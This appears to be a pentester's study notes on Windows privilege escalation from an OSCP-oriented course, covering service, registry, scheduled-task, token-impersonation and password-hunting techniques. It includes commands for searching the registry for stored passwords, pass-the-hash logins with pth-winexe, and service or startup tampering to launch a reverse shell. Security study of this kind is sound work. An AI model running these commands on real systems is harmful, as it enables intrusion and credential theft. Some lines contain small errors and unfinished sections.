Windows Privilege Escalation

Synopsis: Below are my notes from the Windows Privilege Escalation for OSCP & Beyond course by Tib3rius along with any other reference material I come across. These notes are meant to be my reference for privilege escalation and if they help others out that’s great. If you find this interesting I highly suggest taking the class referenced above as they are excellent and were very informative. This will be a living document and will change as I come across new information.

• Basic Terms

  • The goal is to get SYSTEM or Administrator

  • User Accounts - User accounts are used to log into a Windows system. Think of a user account as a collection of settings/preferences bound to a unique identity. The local “Administrator” account is created by default at installation. Several other default user accounts may exist (e.g. Guest) depending on the version of Windows

  • Service Accounts - Service accounts are (somewhat obviously) used to run services in Windows. Service accounts cannot be used to sign into a Windows system. The SYSTEM account is a default service account which has the highest privileges of any local account in Windows. Other default service accounts include NETWORK SERVICE and LOCAL SERVICE.

  • Groups - User accounts can belong to multiple groups, and groups can have multiple users.

    • Regular groups (e.g. Administrators, Users) have a set list of members.

    • Pseudo groups (e.g. “Authenticated Users”) have a dynamic list of members which changes based on certain interactions.

  • ACL - Permissions to access a certain resource in Windows are controlled by the access control list (ACL) for that resource.

  • ACE - Each ACL is made up of zero or more access control entries (ACEs). Each ACE defines the relationship between a principal (e.g. a user, group) and a certain access right.

• Kernel Exploits

  • The kernel is the core of the OS. Exploiting the kernel can crash the system and should be a last resort.

  • Windows Exploit Suggester and Watson can be used to enumerate exploits

    • An example of how to enumerate the kernel with windows exploit suggester is “python wes.py <outputofsysteminfocmd>.txt -i 'Elevation of Privilege' --exploits -only | less”

  • Precompiled exploits can be found here.

  • A great list of kernel Exploits can be found here.

• Service Exploits

  • Basic Commands

    • Query service configuration

      • sc.exe qc <name>

    • Query service status

      • sc.exe query <name>

    • Modify service configuration option

      • sc.exe query <name>

    • Start/Stop a service

      • net start/stop <name>

  • Insecure Service Properties

    • Services have ACLs surrounding them like start, stop, query, read, change, and enumerate.

    • accesschk.exe can be used to enumerate service ACLs with the command “accesschk.exe /accepteula -uwcqv <user> <service>“

    • An example would be changing the binary path of a service to an exploit and then running the service.

  • Unquoted Service Path

    • Windows allows you to run executables

  • Weak Registry Permissions

    • The Registry holds entries for each service. There are ACLs around registry entries

    • Powershell can be used to enumerate registry ACLs with the “Get-Acl <registry path> | Format-List“ command or accesschk.exe can be used with the “accesschk.exe /accepteula -uvwqk <registry path>“ command

    • We can change the bin path of the service to our reverse shell with the “reg add <registry path> /v ImagePath /t REG_EXPAND_SIZE /d <reverse path> /f“

  • Insecure Service Executables

    • If permissions allow us to modify the executable than we can simply rename our reverse shell and replace it.

    • This can be identified with winpeas and then checked with access check using the “accesschk.exe /accepteula -quvw <executable path>” command

  • DLL Hijacking

    • If an existing DLL is writable or the path of a missing DLL is writable we can create a malicious DLL and place it where windows expects it.

• Registry Exploits

  • Using autoruns you can configure windows to run commands with elevated privileges at startup.

  • To enumerate you can use winPEAS with the “.\winPEASany.exe quiet applicationsinfo“ command, or use “reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run“ to check manually.

    • “.\accesschk.exe /accepteula -wvu "<vulnerable autorun file>"“ can be used to check the permissions

• Passwords

  • Even admins reuse passwords and windows stores them in clear text in the registr

  • the “reg query HKLM /f password /t REG_SZ /s” and “reg query HKCU /f password /t REG_SZ /s” command can be used to fully search the registry for word “password”. This is more thorough than winPEAS.

  • WinPEAS can also be used using the “.\winPEASany.exe quiet filesinfo userinfo“ command.

  • Saved putty sessions can be located using the “reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s“ command.

  • You can connect to a windows machine from kali with the “winexe -U '<username>%<userpassword>' //<machineIP> cmd.exe“ command.

  • The SAM and SYSTEM are located in the C:\Windows\System32\config directory. The files contain password hashes. Backups are located in C:\Windows\Repair or C:\Windows\System32\config\RegBack.

  • Windows accepts hashes as well as password to authenticate.

    • If you have the access to the SAM file you can use the “pth-winexe -U '<user>%<passwordhash>' //192.168.1.22 cmd.exe“ for users and “pth-winexe --system -U '<user>%<passwordhash>' //192.168.1.22 cmd.exe“

      • Note that the entire hash is needed for this to work.

• Scheduled Tasks

  • Scheduled tasks can be enumerated with the “schtasks /query /fo LIST /v“ command or the “Get-ScheduledTask| where {$_.TaskPath-notlike"\Microsoft*"} | ft TaskName,TaskPath,State” in power shell.

  • If a file that is being triggered by a scheduled task can be located and permissions don’t stop editing it can be modified to elevate privileges.

• Insecure GUI Apps

  • If an app is running with admin privileges child processes can be spawned with admin privileges.

  • Enumerating vulnerable Apps can be done with the “tasklist /V“ with the option to narrow the search by adding the “| findstr <string>“ command.

  • Once located the “file:\\C:\Windows\System32\cmd.exe“ command can be entered in the search to spawn a privileged shell.

• Startup Apps

  • Startup apps can be found in the C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp directory

  • If files can be created or edited in this directory a reverse shell executable can be created to escalate privileges when an admin logs in.

  • Must be a .lnk file

• Installed Apps

  • Exploitdb can be used to check if the system is using a vulnerable app version.

    • Generally a misconfiguration is still needed to use the exploits listed here.

  • The command “tasklist /V”, WinPEAS (procesinfo option), and Seatbelt can be used to determine version numbers.

• Hot potato

  • Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing on Windows 7, 8, 10, Server 2008, Server 2012.

  • The “.\potato.exe-ip <windowsIP> -cmd "C:\PrivEsc\reverse.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true” command to run this attack on a windows machine. The code can be found here.

• Token Impersonation

  • Service accounts can be given special privileges in order to run their services but can not be logged into directly.

  • Service accounts generally have the Selmpersonate and SeAssignPrimaryToken privileges which allow the account to impersonate the access tokens of other users including the SYSTEM user

    • This allows the following token impersonation attacks to be carried out.

      • RottenPotato

      • JuicyPotato

      • RoguePotato

      • PrintSpoofer

• Port Forwarding

  • It can be easier to run exploit code on kali. If the vulnerable program is listening on an internal port it can be possible to establish an SSH connection to kali and port forward from kali to the windows machine and execute an exploit. plink.exe from the makers of putty can be used for this.

  • The “plink.exe <user>@<kali-ipP> -R <kali-port>:<target-IP>:<target-port>” command can be used to accomplish this.

  • Once connected to kali winexe can be utilized to connect via localhost with the “winexe -U '<admin>%<password>' //127.0.0.1 cmd.exe“
    

• Commands

  • Check privilages

    • “whoami /priv”

  • Create an smb share in linux to move files between machines

    • “python3 /usr/share/doc/python3- impacket/examples/smbserver.py <file-that-needs-sharing> .“

• Tools

  • PowerUp

  • SharpUp

  • Seatbelt

  • winPEAS

  • Potato

  • JAWS

  • Windows-Exploit-Suggester

  • wesng

  • Sherlock
    
    

• Other Resources

  • http://www.fuzzysecurity.com/tutorials/16.html

  • http://pwnwiki.io/#!privesc/windows/index.md

  • https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

  • https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

  • https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194

  • https://book.hacktricks.xyz/windows/windows-local-privilege-escalation